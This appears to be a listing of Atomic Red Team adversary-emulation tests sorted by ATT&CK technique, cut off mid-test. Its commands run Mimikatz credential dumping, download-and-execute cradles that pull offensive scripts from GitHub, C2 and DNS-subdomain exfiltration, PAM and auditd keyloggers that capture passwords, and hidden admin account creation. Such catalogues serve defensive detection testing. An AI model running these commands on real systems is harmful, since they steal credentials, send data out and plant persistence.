command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1039 Data from Network Shared Drive · 2 tests

command_promptelevatedwindowsCopy a sensitive File over Administrative share with copy

copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}

powershellelevatedwindowsCopy a sensitive File over Administrative share with Powershell

copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"

T1041 Exfiltration Over C2 Channel · 2 tests

powershellwindowsC2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

powershellwindowsText Based Data Exfiltration using DNS subdomains

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

T1056.001 Keylogging · 8 tests

powershellelevatedwindowsInput Capture

&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}

shelevatedlinuxLiving off the land Terminal Input Capture on Linux with pam.d

if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth

shelevatedlinuxLogging bash history to syslog

PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog

shelevatedlinuxLogging sh history to syslog/messages

PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages

bashlinuxBash session based keylogger

trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}

shelevatedlinuxSSHD PAM keylogger

cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh #{user_account}@localhost 
whoami
sudo su
whoami
exit
exit

shelevatedlinuxAuditd keylogger

auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start now

bashmacosMacOS Swift Keylogger

swift #{swift_src} -keylog

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1078.001 Default Accounts · 3 tests

command_promptelevatedwindowsEnable Guest account with RDP capability and admin privileges

net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

command_promptelevatedwindowsActivate Guest Account

net user #{guest_user} /active:yes

shelevatedmacosEnable Guest Account on macOS

sudo sysadminctl -guestAccount on

T1078.003 Local Accounts · 13 tests

command_promptelevatedwindowsCreate local account with admin privileges

net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add

bashelevatedmacosCreate local account with admin privileges - MacOS

dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser

bashelevatedmacosCreate local account with admin privileges using sysadminctl utility - MacOS

sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin

bashelevatedmacosEnable root account using dsenableroot utility - MacOS

dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user

bashelevatedmacosAdd a new/existing user to the admin group using dseditgroup utility - macOS

dseditgroup -o edit -a art-user -t user admin

powershellelevatedwindowsWinPwn - Loot local Credentials - powerhell kittie

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive

powershellelevatedwindowsWinPwn - Loot local Credentials - Safetykatz

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive

bashelevatedlinuxCreate local account (Linux)

password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"

bashelevatedlinuxReactivate a locked/expired account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art

shelevatedlinuxReactivate a locked/expired account (FreeBSD)

pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit

bashelevatedlinuxLogin as nobody (Linux)

cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody

shelevatedlinuxLogin as nobody (freebsd)

cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit

command_promptelevatedwindowsUse PsExec to elevate to NT Authority\SYSTEM account

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami

T1078.004 Cloud Accounts · 3 tests

shgoogle-workspace, iaas:gcpCreating GCP Service Account and Service Account Key

gcloud config set project #{project-id}
gcloud iam service-accounts create #{service-account-name}
gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}

powershelliaas:azureAzure Persistence Automation Runbook Created or Modified

New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}

shiaas:gcpGCP - Create Custom IAM Role

gcloud config set project #{project-id}
gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}

T1082 System Information Discovery · 25 tests

command_promptwindowsSystem Information Discovery

systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

shmacosSystem Information Discovery

system_profiler
ls -al /Applications

shlinux, macosList OS Information

uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi   
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null

bashelevatedlinuxLinux VM Check via Hardware

if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi

bashelevatedlinuxLinux VM Check via Kernel Modules

sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"

shlinuxFreeBSD VM Check via Kernel Modules

kldstat | grep -i "vmm"
kldstat | grep -i "vbox"

command_promptwindowsHostname Discovery (Windows)

hostname

shlinux, macosHostname Discovery

hostname

command_promptwindowsWindows MachineGUID Discovery

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid

powershellwindowsGriffon Recon

cscript "#{vbscript}"

command_promptwindowsEnvironment variables discovery on windows

set

shlinux, macosEnvironment variables discovery on freebsd, macos and linux

env

shmacosShow System Integrity Protection status (MacOS)

csrutil status

powershellwindowsWinPwn - winPEAS

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput

powershellwindowsWinPwn - itm4nprivesc

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput

powershellwindowsWinPwn - Powersploits privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - General privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - GeneralRecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive

powershellwindowsWinPwn - Morerecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput

powershellwindowsWinPwn - RBCD-Check

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive

powershellwindowsWinPwn - PowerSharpPack - Watson searching for missing windows patches

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson

powershellwindowsWinPwn - PowerSharpPack - Sharpup checking common Privesc vectors

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"

powershellwindowsWinPwn - PowerSharpPack - Seatbelt

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"

powershellelevatedazure-adAzure Security Scan with SkyArk

Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force      
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred

shlinuxLinux List Kernel Modules

lsmod
kmod list
grep vmw /proc/modules

T1083 File and Directory Discovery · 9 tests

command_promptwindowsFile and Directory Discovery (cmd.exe)

dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}

powershellwindowsFile and Directory Discovery (PowerShell)

ls -recurse
get-childitem -recurse
gci -recurse

shlinux, macosNix File and Directory Discovery

ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh

shlinux, macosNix File and Directory Discovery 2

cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"

powershellwindowsSimulating MAZE Directory Enumeration

$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
$UsersFolder = "$env:homedrive\Users\"
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
{
foreach ($secondarydirectory in $folderarray)
 {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
}
cat #{File_to_output}

powershellwindowsLaunch DirLister Executable

Start-Process "#{dirlister_path}"
Start-Sleep -Second 4
Stop-Process -Name "DirLister"

command_promptwindowsESXi - Enumerate VMDKs available on an ESXi Host

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

shlinuxIdentifying Network Shares - Linux

findmnt -t nfs

powershellwindowsRecursive Enumerate Files And Directories By Powershell

$out = "#{output_file}"
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
$userProfile = [Environment]::GetFolderPath('UserProfile')
$tr = [System.Collections.Generic.List[string]]::new()

function MatchesExtension($path) {
  try {
    $e = [System.IO.Path]::GetExtension($path).ToLower()
    return $exts -contains $e
  } catch { return $false }
}

function Scan-Dir($root) {
  try {
    $match = $false
    foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
    if (-not $match) { return }

    [System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
      if (MatchesExtension $_) {
        $fi = [System.IO.FileInfo]::new($_)
        $tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
      }
    }

    [System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
      Scan-Dir $_
    }
  } catch [System.UnauthorizedAccessException] {
    $tr.Add("[AccessDenied] $root")
  } catch {
    $tr.Add("[Error] $root => $($_.Exception.Message)")
  }
}

[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }

# Ensure output dir exists
$outDir = [System.IO.Path]::GetDirectoryName($out)
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
  New-Item -Path $outDir -ItemType Directory -Force | Out-Null
}

# Write results
$tr | Out-File -FilePath $out -Encoding UTF8
Write-Output "Enumeration complete. Results written to: $out"

T1098 Account Manipulation · 17 tests

powershellelevatedwindowsAdmin Account Manipulate

$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHa_$x$y$z

$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name

foreach($member in $fmm) {
    if($member -like "*Administrator*") {
        $account = $member.Name.Split("\")[-1] # strip computername\
        $originalDescription = (Get-LocalUser -Name $account).Description
        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
        Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
        }
    }

powershellwindowsDomain Account and Group Manipulate

$x = Get-Random -Minimum 2 -Maximum 99
$y = Get-Random -Minimum 2 -Maximum 99
$z = Get-Random -Minimum 2 -Maximum 99
$w = Get-Random -Minimum 2 -Maximum 99

Import-Module ActiveDirectory
$account = "#{account_prefix}-$x$y$z"
New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
Add-ADGroupMember "#{group}" $account

shiaas:awsAWS - Create a group and add a user to that group

aws iam create-group --group-name #{username}
aws iam add-user-to-group --user-name #{username} --group-name #{username}

powershellazure-adAzure AD - adding user to Azure AD role

Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential

$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
if ($user -eq $null) { Write-Warning "User not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"

powershellazure-adAzure AD - adding service principal to Azure AD role

Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential

$sp = Get-AzureADServicePrincipal -Filter "DisplayName eq '#{service_principal_name}'"
